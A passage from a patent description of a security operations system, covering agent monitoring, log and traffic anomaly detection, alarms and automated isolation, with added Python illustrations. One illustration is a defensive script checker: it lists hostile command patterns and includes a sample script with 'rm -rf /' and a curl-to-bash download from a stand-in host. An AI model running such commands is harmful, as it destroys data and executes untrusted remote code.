By adopting the embodiment of the application, a two-layer protection mode is used in which outlier detection is performed on the system log data and decision tree detection on the network traffic data, so that security events on the terminal equipment are detected and warned of in time, the overall security protection capability of the system is improved and the impact of security threats is reduced.
As an alternative, generating the alarm message according to the target event when the target event exists includes: determining at least one of the file path and the process path related to the target event; determining the event type of the target event on the basis of the file path and/or the process path; and generating the alarm message according to the event type.
Optionally, in an embodiment of the present application, the target event refers to any behaviour or abnormal situation detected on the terminal device that is inconsistent with the security policy, including but not limited to malware infection, unauthorised access attempts, network attacks and the like. The file path and the process path refer to the specific location information related to the target event on the terminal device: the file path points to a file that may contain malicious code, and the process path identifies the process that executed the abnormal operation.
In one exemplary embodiment, when the lightweight security proxy service detects a target event on the terminal device, such as an abnormal file access pattern or suspicious network traffic, the operation and maintenance management platform immediately analyzes the event details to determine a file path or a process path associated with the target event. Further, an event type is determined based on the path information.
For example, if the file path matches the signature of known malware, the event type may be defined as "malware infection". The system then generates a detailed alert message according to the event type, including the event description, time stamp, specific information on the file or process that triggered the event, and recommended countermeasures. The alarm message is sent in time to the operation and maintenance personnel and system administrators through channels such as the interaction platform, the mail system and the short message service, ensuring a quick response.
According to the embodiment of the application, the event type determining mechanism based on the file path and the process path is adopted, so that the fine early warning of the security event is realized, the purposes of improving the response efficiency and reducing the influence of the event are achieved, and important technical support is provided for constructing a stable and safe operation and maintenance environment.
In an alternative scheme, the method further comprises: when the event type is a file alarm type, controlling the operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service so as to acquire the system environment information of the terminal equipment, and storing the system environment information in a log file under an alarm record directory, wherein the system environment information comprises information on the processes currently running on the terminal equipment.
Optionally, in an embodiment of the present application, the event type refers to a tag that the security operation and maintenance system classifies a target event, and the file alert type is one of the event types, which indicates that a file or a directory on the terminal device has abnormal behavior or potential security problems. The operation and maintenance management platform is a core component for intensively processing and distributing the security instructions and is responsible for executing the response flow of the file alarming event. The lightweight security proxy service is used as a front-end component on the terminal equipment and is used for receiving and executing the instruction sent by the operation and maintenance management platform, so as to ensure that necessary system environment information is acquired in real time.
It should be noted that, the acquisition range and frequency of the system environment information may be adjusted according to a specific security policy and resource consumption. In addition to running process information, system environment information can be extended to CPU utilization, memory status, network connection status, etc., which is not limited in this application, and is intended to provide an extensible and flexible event response mechanism.
In an exemplary embodiment, when the operation and maintenance management platform receives a file alarm event, it immediately generates a monitoring instruction and sends it to the terminal device through the lightweight security proxy service. After receiving the instruction, the proxy service rapidly acquires the current system environment information of the terminal device, in particular the list of running processes including process ID, name and resource usage. This information is then recorded in a log file under the alarm record directory to facilitate subsequent event analysis and auditing. Operation and maintenance personnel are thus guaranteed a complete snapshot of the system environment at the time of the file alarm, so that the cause and scope of the event can be judged more accurately.
By adopting the embodiment of the application, the technology of automatically acquiring and storing the system environment information after the triggering of the file alarm event is adopted, the detailed record of the system state when the event occurs is realized, the purposes of improving the accuracy of the event response and facilitating the tracking and analysis of the safety event are achieved, and the key support is provided for constructing a safer and controllable operation and maintenance system.
As an alternative scheme, the method further comprises: when the event type is a process alarm type and a matching historical alarm of the same type is found, storing the system environment information in the log file and calling a target processing script to process the target event, wherein the target processing script executes a preset repair operation to repair the system error caused by the target event; and when the event type is the process alarm type and no matching historical alarm of the same type is found, setting the forwarding weight of the reverse proxy server for the terminal device to 0 through the lightweight security proxy service.
Optionally, in the embodiment of the present application, the process alarm type refers to an anomaly or security threat detected by the security operation and maintenance system that is associated with a process running on the terminal device, including but not limited to the start of an illegal process, abnormal behaviour with high resource consumption and identification of known malicious behaviour. The system environment information covers the overall running state of the terminal device, including but not limited to CPU usage, memory occupancy, network connection status and the currently active processes. The target processing script is a predefined series of operational instructions aimed at automatically repairing or mitigating system errors caused by process alarm events, such as terminating a process, restarting a service or adjusting a system configuration. The lightweight security proxy service, as the front-end component on the terminal device, executes the instructions sent by the operation and maintenance management platform, including dynamically adjusting the forwarding weight of the reverse proxy server.
It should be noted that, the generating and executing processes of the target processing script may be customized according to the actual operation and maintenance requirements and the security policy, which may be a simple one-step operation or a complex multi-step process. Meanwhile, the adjustment strategy of the forwarding weight of the reverse proxy server also considers the balance of service continuity and safety, and the application is not limited to the balance, so as to provide a flexible, efficient and automatic event response mechanism.
In one exemplary embodiment, when the security operation and maintenance system recognises a process alarm event on the terminal device and matches it to the same event type in the historical alarm database, the operation and maintenance management platform automatically executes the target processing script corresponding to that event type. Before the script executes, the system environment information is recorded in a log file for subsequent analysis. If no matching event is found in the historical alarm database, the operation and maintenance management platform resets the reverse proxy forwarding weight of the terminal device to 0 through the lightweight security proxy service to prevent the potential security risk from spreading, thereby temporarily isolating the device until manual review and handling are completed.
According to the embodiment of the application, the intelligent response based on the history alarm database and the dynamic adjustment strategy of the reverse proxy server forwarding weight are adopted, so that the automatic processing and isolation of the process alarm event are realized, the purposes of improving the safety, guaranteeing the system stability and reducing the workload of operation and maintenance personnel are achieved, and necessary technical support is provided for constructing a modern and intelligent operation and maintenance system.
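The following is an added example covering the decision, alarm-generation and response steps described in the preceding paragraphs (fusion of the two detection results, event typing from the file or process path, the file-alarm environment snapshot, and the process-alarm runbook-or-isolate branch); it is not code from the patent. It runs against a fake agent so it executes offline. Two assumptions are made where the text does not fix the detail: a process path takes precedence over a file path when both are present, and historical alarms are matched by a keyword found in the process path.

```python
"""Added example (not the patent's code): detection fusion, alarm building and
the file/process response flow against a fake agent. Assumed: process path
wins over file path for typing; history is matched by a keyword in the path."""
import json
import os
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class TargetEvent:
    host: str
    file_path: Optional[str] = None
    process_path: Optional[str] = None


def has_target_event(first_abnormal: bool, second_abnormal: bool, require_both: bool = False) -> bool:
    """Fuse the two detection results; require_both selects the stricter policy."""
    return (first_abnormal and second_abnormal) if require_both else (first_abnormal or second_abnormal)


def classify_event(ev: TargetEvent) -> str:
    if ev.process_path:
        return "process"
    if ev.file_path:
        return "file"
    return "unknown"


def build_alarm(ev: TargetEvent, now: int) -> Dict:
    kind = classify_event(ev)
    return {"host": ev.host, "event_type": kind, "file_path": ev.file_path,
            "process_path": ev.process_path, "timestamp": int(now),
            "description": f"{kind} alarm on {ev.host}"}


class FakeAgent:
    """Stand-in for the lightweight security proxy: records instructions."""
    def __init__(self):
        self.calls: List = []
        self.nginx_weight = 1

    def snapshot_environment(self) -> Dict:
        self.calls.append("snapshot")
        return {"cpu_percent": 37.5, "processes": [{"pid": 4242, "name": "nginx", "cpu": 1.2}]}

    def run_script(self, path: str) -> int:
        self.calls.append(("script", path))
        return 0

    def set_nginx_weight(self, weight: int) -> None:
        self.calls.append(("weight", weight))
        self.nginx_weight = weight


class ResponseDispatcher:
    def __init__(self, agent: FakeAgent, alarm_dir: str, history: Dict[str, str]):
        self.agent, self.alarm_dir, self.history = agent, alarm_dir, history
        os.makedirs(alarm_dir, exist_ok=True)

    def _write_env_log(self, alarm: Dict, env: Dict) -> str:
        path = os.path.join(self.alarm_dir, f"{alarm['host']}-{alarm['timestamp']}.json")
        with open(path, "w", encoding="utf-8") as fh:
            json.dump({"alarm": alarm, "environment": env}, fh)
        return path

    def handle(self, alarm: Dict) -> Tuple[str, str]:
        """Returns (action, env_log_path). Both alarm kinds snapshot the host;
        only process alarms trigger a repair script or isolation."""
        log_path = self._write_env_log(alarm, self.agent.snapshot_environment())
        if alarm["event_type"] == "file":
            return "logged", log_path
        if alarm["event_type"] == "process":
            for keyword, script in self.history.items():
                if keyword in alarm["process_path"]:
                    self.agent.run_script(script)
                    return "repaired", log_path
            self.agent.set_nginx_weight(0)  # no runbook: take the host out of rotation
            return "isolated", log_path
        return "ignored", log_path


def run_demo() -> Dict:
    """Drive a file alarm, a known process alarm and an unknown one."""
    agent = FakeAgent()
    disp = ResponseDispatcher(agent, tempfile.mkdtemp(prefix="alarm-"),
                              history={"cryptominer": "/opt/runbooks/kill_miner.sh"})
    events = [TargetEvent("host1", file_path="/tmp/x.so"),
              TargetEvent("host1", process_path="/tmp/.x/cryptominer"),
              TargetEvent("host1", process_path="/tmp/unknown_bin")]
    out = []
    for i, ev in enumerate(events):
        action, log_path = disp.handle(build_alarm(ev, 1700000000 + i))
        out.append((classify_event(ev), action, os.path.exists(log_path)))
    return {"results": out, "nginx_weight": agent.nginx_weight, "calls": agent.calls}


if __name__ == "__main__":
    print(run_demo())
```

Note the ordering in `handle`: the environment snapshot is written before any repair script runs, matching the text's requirement that the state at the time of the alarm is preserved for later analysis rather than the state after the runbook has changed it.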
In an exemplary embodiment, the event detection method provided by the application can be applied to a lightweight security operation and maintenance system. In a traditional operation and maintenance environment, servers are managed mainly by hand; as the number and variety of server hosts grow, the operation and maintenance management system becomes hard to extend and keep compatible, and maintenance cost rises. At the same time, manual operation is prone to omissions, is inefficient and easily creates security risks.
For this reason, the lightweight security operation and maintenance system designed and implemented in the embodiment of the application is deployed out of band (bypass deployment) in an isolated network environment, uniformly authenticates the identity and permissions of logged-in users, and implements automated operation and maintenance, centralised configuration monitoring, log management and security policy. Hosts in a hybrid environment are managed efficiently, consistency is ensured, security is improved, and the flexibility and controllability of operation and maintenance are enhanced.
Illustratively, FIG. 3 is a schematic diagram of an alternative event detection method according to an embodiment of the present application, as shown in FIG. 3, the system architecture includes a lightweight security agent, a centralized management platform.
S1, a lightweight security agent is deployed on each protected device; the agent is responsible for collecting system and network activity data, performing preliminary security analysis and processing, and executing instructions from the operation and maintenance management platform. The agent is designed for low resource usage and efficiency and supports a variety of operating systems and platforms; it can be implemented in python, using python's standard library to issue Linux commands and process their results.
Further, the security agent is divided into a client side and a server side. The client runs continuously as a loop in the background of the host, sampling once every 10 seconds; monitoring data older than one day is kept at one sample per minute only, and data is retained for at most 30 days. The python script is invoked from the operating system shell and supports start, stop and status-query operations. When system resource usage is high and CPU utilisation reaches 95%, the agent process ends itself automatically, and it is restarted once resource usage returns to normal, i.e. falls below 90%. The host monitoring information collected by the agent process is sent back over UDP, using socket programming, to the server-side agent on the operation and maintenance management platform. The operation and maintenance management platform runs the server side of the agent, sends heartbeat packets to the host agents at regular intervals to confirm that they are alive, sends alarm information to the administrator when an agent has been offline for more than 5 minutes, and displays the online state of each agent in the system.
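The following is an added example of three pieces of the agent behaviour described above, with the thresholds the text gives (10 s sampling, 95%/90% CPU gate, one sample per minute after a day, 30-day retention, offline after 5 minutes without a heartbeat); it is not code from the patent. Timestamps are plain integers and the sample series is constructed so that it runs offline. The UDP transport itself is not shown; note that plain UDP carries no sender authentication, so the encryption the text mentions later would need to cover these datagrams for the server to trust what it receives.

```python
"""Added example (not the patent's code): CPU hysteresis gate, heartbeat
liveness tracking and the 10 s / 1 min / 30 day retention policy. Times are
integer seconds; the sample series is constructed."""
from typing import Dict, Iterable, List, Tuple

SAMPLE_INTERVAL = 10
DAY = 86_400


class CpuGate:
    """Hysteresis gate: stop the agent at >= 95 % CPU, restart only once
    utilisation is back below 90 %, so it does not flap around one threshold."""
    def __init__(self, stop_at: float = 95.0, resume_below: float = 90.0):
        self.stop_at, self.resume_below = stop_at, resume_below
        self.running = True

    def observe(self, cpu_percent: float) -> bool:
        if self.running and cpu_percent >= self.stop_at:
            self.running = False
        elif not self.running and cpu_percent < self.resume_below:
            self.running = True
        return self.running


class HeartbeatMonitor:
    """Server-side liveness: hosts whose last heartbeat is older than
    `offline_after` seconds are reported as offline (the text uses 5 min)."""
    def __init__(self, offline_after: int = 300):
        self.offline_after = offline_after
        self.last_seen: Dict[str, int] = {}

    def record(self, host: str, ts: int) -> None:
        # Keep the newest timestamp even if datagrams arrive out of order.
        self.last_seen[host] = max(ts, self.last_seen.get(host, ts))

    def offline_hosts(self, now: int) -> List[str]:
        return sorted(h for h, t in self.last_seen.items() if now - t > self.offline_after)


def retain(samples: Iterable[Tuple[int, float]], now: int, full_window: int = DAY,
           bucket: int = 60, max_age: int = 30 * DAY) -> List[Tuple[int, float]]:
    """Retention policy: keep every sample from the last day, the first sample
    of each `bucket`-second interval for older data, nothing beyond `max_age`."""
    kept, seen_buckets = [], set()
    for ts, value in sorted(samples):
        age = now - ts
        if age > max_age:
            continue
        if age <= full_window:
            kept.append((ts, value))
            continue
        b = ts // bucket
        if b not in seen_buckets:
            seen_buckets.add(b)
            kept.append((ts, value))
    return kept


def constructed_series(now: int, days: int = 2) -> List[Tuple[int, float]]:
    """Constructed: one sample every 10 s for `days` days ending at `now`."""
    start = now - days * DAY
    return [(ts, 40.0) for ts in range(start, now + 1, SAMPLE_INTERVAL)]


if __name__ == "__main__":
    now = 3_000_000
    print(len(constructed_series(now)), "->", len(retain(constructed_series(now), now)))
```

Two days of 10-second samples (17281 points) reduce to 8641 full-rate points for the most recent day plus 1440 one-per-minute points for the day before, which is the storage profile the text describes.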
And S2, the centralized management platform comprises three parts, namely an interaction platform, an operation and maintenance management platform and a log monitoring analysis platform. The three platform modules are mutually matched, have high-efficiency data processing capacity and friendly user interfaces, and support real-time monitoring and report generation.
Specifically, the user accesses the safe operation and maintenance system through the interactive platform, and the operation and maintenance management platform is the core of the safe operation and maintenance system and is used as a hub for system information exchange, and not only processes commands, but also forwards data. The log monitoring and analyzing platform is used for analyzing the detailed information of the collected information and the log.
Illustratively, FIG. 4 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application, as shown in FIG. 4:
S1, the interaction platform interacts directly with operation and maintenance personnel: it receives the user's operation and maintenance input and displays the functional output of the security operation and maintenance system, including user information and permissions, host information visualisation, operation and maintenance history and the like. Operation and maintenance personnel log in on the operation and maintenance host with a user name and password, complete two-factor authentication via their mobile phone number, and enter the security operation and maintenance system. The home page of the interaction platform displays the list of managed hosts according to the user's permissions. When logging in to a specific host, the passwords are collected and managed centrally by the platform, so the user only selects a user name to log in. If a dual-approval mechanism is configured, then when the user clicks to log in, a higher-privilege person must enter their user name and a one-time token (rotated every 30 seconds) and confirm that the operation is legitimate before the login proceeds. Logins to the interaction platform are not restricted to the intranet; they can be made from the intranet, from the Internet and from the operations room.
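The following is an added example of the dual-approval step described above, with the 30-second rotating token implemented as RFC 6238 TOTP over HMAC-SHA1 (an assumption: the text says only that the token changes every 30 seconds); it is not code from the patent. The approver key, user names and time values are constructed; the first two checks in the test are the published RFC 6238 SHA-1 test vectors.

```python
"""Added example (not the patent's code): RFC 6238 TOTP and a dual-approval
check that rejects unknown approvers and self-approval."""
import hashlib
import hmac
import struct
from typing import Dict


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = unix time // step."""
    return hotp(key, now // step, digits)


def verify_totp(key: bytes, code: str, now: int, step: int = 30, window: int = 1) -> bool:
    """Accept the current step and +/- `window` neighbours (clock skew);
    compare in constant time so the check does not leak partial matches."""
    counter = now // step
    return any(
        hmac.compare_digest(hotp(key, counter + d), code)
        for d in range(-window, window + 1)
    )


class DualApproval:
    """A login to a managed host must be countersigned by a different,
    higher-privilege user presenting a valid token for their own key."""
    def __init__(self, approver_keys: Dict[str, bytes]):
        self.approver_keys = approver_keys

    def approve(self, operator: str, approver: str, token: str, now: int) -> bool:
        key = self.approver_keys.get(approver)
        if key is None or approver == operator:  # unknown approver or self-approval
            return False
        return verify_totp(key, token, now)


if __name__ == "__main__":
    demo_key = b"12345678901234567890"  # constructed; RFC 6238 test-vector secret
    print(totp(demo_key, 59), DualApproval({"lead": demo_key}).approve("alice", "lead", totp(demo_key, 59), 59))
```

The acceptance window of one step on either side is the usual trade-off between tolerating clock drift and widening the replay window; a production deployment should also remember the last accepted counter per approver so a captured token cannot be replayed within the same step.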
S2, the operation and maintenance management platform handles the actual operation and maintenance functions of the hosts, including host login, file upload, execution of automated operation and maintenance scripts and other specific operations. The interaction platform only sends requests; to accommodate varied access requests it should not contain specific business logic, and identity authentication and authorisation checks are carried out by the operation and maintenance management platform. Besides collecting the data returned by the agents, the platform forwards traffic mirrors to the log monitoring platform for more comprehensive detection and analysis. The operation and maintenance management platform also inspects and checks configuration scripts before they are executed, improving the security of configuration operations.
S3, the log monitoring and analysis platform collects data from each security agent by bypass (out-of-band) monitoring and performs comprehensive security analysis, event detection and response. The data collected from the hosts is recorded as logs; when the collected data needs to be displayed, the logs are converted into charts with python and sent to the interaction platform. Only text is stored at the back end, which reduces file storage pressure. When a high-risk event is detected, the system also sends the information to the interaction platform and automatically pushes it to the administrator's mailbox and the short message platform.
Illustratively, FIG. 5 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application, as shown in FIG. 5, including four functions of automated operation and maintenance management, security policy management, event detection and response, and log management.
S1, automated operation and maintenance management: the interaction platform collects a command set and submits it to the operation and maintenance management platform, which distributes the commands to the corresponding lightweight security agents for execution of the user's uploaded instructions. Batch script execution: prepared shell and other operation and maintenance scripts are pushed through the lightweight security agents to the hosts that will execute them, and running the scripts in batch implements automated operation and maintenance.
S2, automated configuration deployment: the managed hosts are grouped by host type and configuration is managed uniformly for hosts of the same type. When a host needs to be changed, the configuration is first checked to confirm its validity. Deployment script commands are initially checked by matching common commands against regular expressions. The regular expression database is refined continuously and each expression is given a description label; an encoder embeds the regular expressions and a mapping from the embeddings to the labels is established. Commands with similar semantics are clustered by contrastive learning to obtain better abstractions. When the model converges, a meta-expression for generating check commands is obtained, which adapts to more varied configuration information. After a configuration command passes the code check, it is sent to the lightweight security agents to implement batch, consistent changes.
Further, for the actual execution of scripts and automated configuration, the user first creates an operation script; once written, the script can be submitted for release with an expected validity period (for example, one month). Configuration is written in yaml, and a template program reads the yaml to generate the configuration execution code directly. The release process includes a local audit and a process audit. The local audit is a manual judgement by high-privilege operation and maintenance personnel, used for rapid approval in emergencies. The process audit includes machine audit and manual audit: first the regular expression and machine-learning check commands perform a preliminary analysis of the script to judge whether its commands are legitimate and whether high-risk operations are present; then the script is audited by a supervisor according to the personnel audit workflow set up initially, and can be executed once the audit passes. When the script is no longer used, it can be submitted to be taken offline.
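The following is an added example of the regular-expression pre-check that the text applies to operation scripts before release, together with the routing of the result into the audit flow (reject, manual audit, or eligible for automatic approval); it is not code from the patent. The pattern database, its labels and severities, and the sample script are constructed; the encoder and contrastive-learning abstraction step is out of scope and only the rule check is shown.

```python
"""Added example (not the patent's code): regex pre-check of an operation
script and mapping of the findings onto the release audit route. Patterns,
severities and the sample script are constructed."""
import re
from typing import Dict, List, Tuple

# (label, severity, compiled pattern). Constructed; extend per site policy.
HIGH_RISK_PATTERNS: List[Tuple[str, str, "re.Pattern[str]"]] = [
    (label, sev, re.compile(pat))
    for label, sev, pat in [
        ("recursive delete of filesystem root", "high",
         r"\brm\s+-[A-Za-z]*[rR][A-Za-z]*\s+/(\*|\s|$)"),
        ("remote download piped into a shell", "high",
         r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
        ("raw write to a block device", "high",
         r"\bdd\b.*\bof=/dev/(sd|nvme|hd|vd|xvd)"),
        ("filesystem format", "high", r"\bmkfs(\.\w+)?\b"),
        ("fork bomb", "high", r":\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:"),
        ("base64-decoded payload executed", "high",
         r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(ba)?sh\b"),
        ("world-writable permissions", "medium",
         r"\bchmod\s+(-R\s+)?[0-7]?777\b"),
        ("eval of dynamic content", "medium", r"\beval\s+\"?\$"),
    ]
]


def strip_comment(line: str) -> str:
    """Drop a trailing '# ...' comment unless the '#' is inside quotes (approximate)."""
    in_s = in_d = False
    for i, ch in enumerate(line):
        if ch == "'" and not in_d:
            in_s = not in_s
        elif ch == '"' and not in_s:
            in_d = not in_d
        elif ch == "#" and not in_s and not in_d:
            return line[:i]
    return line


def check_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, label, severity) for every matching line."""
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = strip_comment(raw).strip()
        if not line:
            continue
        for label, sev, pat in HIGH_RISK_PATTERNS:
            if pat.search(line):
                findings.append((n, label, sev))
    return findings


def release_verdict(text: str) -> Dict:
    """Map findings onto the audit route: reject on high, manual audit on
    medium, otherwise eligible for automatic approval."""
    findings = check_script(text)
    severities = {sev for _, _, sev in findings}
    if "high" in severities:
        verdict = "reject"
    elif "medium" in severities:
        verdict = "manual-audit"
    else:
        verdict = "auto-approve"
    return {"verdict": verdict, "findings": findings}


# Constructed sample script submitted for release.
SAMPLE_SCRIPT = """#!/bin/bash
# rotate application logs
set -euo pipefail
find /var/log/app -name '*.log' -mtime +7 -delete
rm -rf /
curl -s http://example.invalid/x.sh | bash
chmod -R 777 /var/www
echo "rm -rf / is not run here"  # quoted text is still flagged by the regex check
"""

if __name__ == "__main__":
    print(release_verdict(SAMPLE_SCRIPT))
```

The last line of the sample is deliberately a false positive: a regex pre-check sees the dangerous string inside a quoted `echo` argument and flags it anyway. That is the right default for a release gate (the cost of a manual look is small), but it is also why the text layers the human process audit on top of the machine check rather than letting the machine check approve scripts on its own.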
S3, security policy management: the interaction platform collects configuration information and sends it to the operation and maintenance management platform for unified configuration, which pushes it to the lightweight security agents to complete the configuration. Policy definition: administrators can define and configure security policies including access control, data protection, network isolation and the like. Policy application: security policies are applied automatically to all protected devices and systems, ensuring consistency and validity.
S4, event detection and response: the lightweight security agent completes data collection and sends the data to the operation and maintenance management platform at regular intervals; after the log monitoring and analysis platform obtains the data, it analyses the traffic and performs detection. Anomaly detection identifies abnormal activity by analysing system logs, network traffic and behaviour patterns, and behaviour analysis with machine learning algorithms identifies potential security threats. Log analysis is done mainly by outlier detection: since the collected host data is mainly a time series of numbers, a threshold range for the expected log values can be generated with an LSTM and regression analysis performed on the data; an alert is raised when the collected data deviates significantly from the threshold range. For command execution logs, a keyword dictionary is built to detect and alert on special keywords. Network traffic is analysed mainly with decision trees: the traffic features are extracted first, the traffic is then combined across a plurality of decision trees with the weight of each tree computed dynamically, similar traffic is clustered, and whether abnormal traffic exists is determined. The pcap file can also be converted into an image so that the payload content is analysed and clustered to judge whether unreasonable traffic exists.
S5, automatic response: an automatic response mechanism is configured so that, when a security event is detected, the log monitoring and analysis platform automatically pushes the alarm information, including the alarm content and the located file path or process path, to the interaction platform. The alarm information is shown as a notification in the display interface, and mail and short messages are sent to the host operation and maintenance personnel and the system administrator. The alarm information is sent synchronously to the operation and maintenance management platform, which uses different processing flows for file alarms and process alarms. For a file alarm, the operation and maintenance management platform pushes an instruction to the agent, queries environment information such as running processes and CPU and memory usage on the host, and records it in a log file under the alarm record directory for later event analysis and localisation. If the alarm concerns a dangerous process, the basic information of the current host is recorded and the alarm is handled automatically by keyword matching against historical alarms. If no corresponding historical alarm can be matched, the operation and maintenance management platform sets the nginx forwarding weight of the dangerous host to 0 through the agent, so that the risk on that host does not spread to other hosts. Operation and maintenance personnel then handle the event manually and record the procedure in the operations manual. Each time a new process alarm is handled, the operations manual entry is turned into a processing script, so that taking a host out of forwarding is avoided as far as possible and the impact on other processes on the host is reduced.
S6, log management: the log monitoring and analysis platform classifies and sorts all processed information and displays it on the interaction platform. Log collection and analysis: the logs from the various devices are collected and analysed centrally to generate detailed security reports and trend analysis. Security management: the login frequency of the host is recorded and the security status of the host is presented as data, which facilitates better management of the host. Visualisation of the data and text is achieved with python and a visualisation library. Log storage and archiving: a secure log storage and archiving mechanism is provided that supports long-term storage and querying of logs. The operation information of the host is recorded and stored, so that when an operation has to be reviewed or timed in the future, the specific operation steps can be traced back through the archived logs, the scene of the problem restored, and the problem solved more quickly.
In general, the embodiment of the application achieves efficient data processing: efficient data processing and storage technology is adopted, and an in-memory database and distributed computation are used to improve the response speed and processing capacity of the system. Data encryption: the transmitted and stored data are encrypted to ensure their confidentiality and integrity. A lightweight security agent and management platform are designed and resource use is optimised, so that the system can operate normally in a low-resource environment. With regard to load balancing, the bottleneck of the system lies mainly in the operation and maintenance management platform; its load is reduced by isolating the display platform from it, and several hosts are configured to form the operation and maintenance management platform together, so that the system operates efficiently and stably.
In addition, whether abnormal traffic exists in the traffic data is determined by a combination of the machine learning model and outlier detection. At the same time, keyword matching is carried out on the log files with a designed alarm dictionary (keywords such as error and failed); a simple and intuitive user interface is provided so that the administrator can conveniently configure, monitor and check reports, and visualisation functions such as charts and dashboards help the administrator quickly understand the security situation and the operation and maintenance state.
The embodiment of the application uses a lightweight security agent and an optimised data processing mechanism, which greatly reduces the occupation of system resources and lowers hardware investment and operation and maintenance cost. It integrates functions such as event detection and response, vulnerability management, security policy management and log management, meeting the comprehensive security and operation and maintenance management requirements of a modern information system, and it focuses on simplifying deployment and maintenance so that comprehensive security protection is achieved with only a small amount of configuration by the administrator. Through the automatic response mechanism and efficient data processing capability, the system can respond to security threats rapidly and reduce potential security risks.
It will be appreciated that in the specific embodiments of the present application, related data such as user information is involved, and when the above embodiments of the present application are applied to specific products or technologies, user permissions or consents need to be obtained, and the collection, use and processing of related data need to comply with related laws and regulations and standards of related countries and regions.
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present application is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present application. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all preferred embodiments, and that the acts and modules referred to are not necessarily required for the present application.
According to another aspect of the embodiment of the present application, there is also provided an event detection apparatus for implementing the event detection method described above. As shown in fig. 6, the apparatus includes:
a deployment module 602, configured to deploy a lightweight security proxy service on a terminal device;
the acquisition module 604 is used for acquiring the operation data of the terminal equipment through the lightweight security proxy service;
An execution module 606, configured to perform an outlier detection operation on system log data in the operation data, determine a first detection result, and perform a decision tree detection operation on network traffic data in the operation data, determine a second detection result;
A determining module 608, configured to determine whether a target event occurs in the terminal device based on the first detection result and the second detection result;
A generating module 610, configured to generate an alarm message according to the target event in the presence of the target event, where the alarm message includes at least one of a file path and a process path that cause the target event to occur, where the file path and the process path are used to locate a source and an influence range of the target event.
As an alternative, to perform the outlier detection operation on the system log data in the operation data and determine the first detection result, the device processes the system log data with a long short-term memory network model to obtain a target threshold range and carries out regression analysis on the system log data based on the target threshold range to determine the first detection result, and/or detects the system log data against a predetermined keyword dictionary to determine the first detection result, where the first detection result indicates whether the system log data is abnormal.
As an alternative, to determine the second detection result, the device performs an eigenvalue decomposition operation on the network traffic data to obtain a target feature vector related to traffic behaviour, processes the target feature vector with a pre-trained decision tree model to obtain similar network traffic data, and clusters the similar network traffic data to obtain the second detection result, where the second detection result indicates whether abnormal traffic exists in the network traffic data; and, where the network traffic data includes a network capture data packet, converts the network capture data packet into image data and performs cluster analysis on the image data to obtain the second detection result.
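As an added worked example (not code from the patent or from the applicant), the following Python shows the traffic side of step S4 and of the apparatus described above: each flow is decomposed into a feature vector, several decision trees vote on it, the weight of each tree is calculated dynamically from labelled reference flows, and the flows flagged as abnormal are clustered by which trees fired. The flow records, the three hand-written trees, the labelled reference flows and the choice of per-tree precision as the dynamic weight are all assumptions of the example; a deployed system would train its trees on real traffic.

```python
"""Added example (not code from the patent or the applicant): the second
detection result for network traffic described in step S4 and in the
apparatus above. Flow records, the three hand-written decision trees, the
labelled reference flows and the way the dynamic weight is derived (precision
of each tree on the reference flows) are all assumptions for this example."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str
    packets: int
    total_bytes: int
    duration_s: float


def features(f):
    """Decompose a flow into the feature vector the decision trees consume."""
    return {
        "dport": f.dport,
        "proto": f.proto,
        "bytes_per_pkt": f.total_bytes / max(f.packets, 1),
        "pkt_rate": f.packets / max(f.duration_s, 1e-3),
    }


# Three small decision trees, each written out as nested conditions (assumption).
def tree_small_fast(x):
    """Many small packets at a high rate (scan- or flood-like)."""
    if x["pkt_rate"] > 200:
        return 1 if x["bytes_per_pkt"] < 80 else 0
    return 0


def tree_large_uncommon_port(x):
    """Large packets to a port that is not ordinary web traffic."""
    if x["bytes_per_pkt"] > 1200:
        return 1 if x["dport"] not in (80, 443) else 0
    return 0


def tree_udp_high_port(x):
    """Sustained UDP to a high port; noisy, because VoIP and media traffic look the same."""
    if x["proto"] == "udp":
        return 1 if x["dport"] > 1024 and x["pkt_rate"] > 50 else 0
    return 0


TREES = [tree_small_fast, tree_large_uncommon_port, tree_udp_high_port]

# Constructed labelled reference flows (1 = abnormal) used to weight the trees.
REFERENCE = [
    (Flow("10.0.0.5", "10.0.0.9", 22, "tcp", 10, 1500, 5.0), 0),
    (Flow("10.0.0.5", "203.0.113.7", 443, "tcp", 400, 520000, 30.0), 0),
    (Flow("10.0.0.8", "10.0.0.9", 8080, "tcp", 3000, 120000, 5.0), 1),
    (Flow("10.0.0.8", "198.51.100.4", 4444, "tcp", 200, 400000, 10.0), 1),
    (Flow("10.0.0.3", "10.0.0.200", 5060, "udp", 3000, 300000, 30.0), 0),
    (Flow("10.0.0.3", "192.0.2.10", 31337, "udp", 6000, 240000, 20.0), 1),
]


def dynamic_weights(trees, reference):
    """Weight each tree by the precision of its 'abnormal' votes on the reference flows."""
    weights = []
    for tree in trees:
        fired = [label for f, label in reference if tree(features(f)) == 1]
        weights.append(sum(fired) / len(fired) if fired else 0.0)
    return weights


def second_detection_result(flows, trees=TREES, reference=REFERENCE, threshold=0.5):
    """Weighted vote of the trees per flow, then cluster flagged flows by detection signature."""
    weights = dynamic_weights(trees, reference)
    abnormal, clusters = [], defaultdict(list)
    for f in flows:
        x = features(f)
        votes = tuple(tree(x) for tree in trees)
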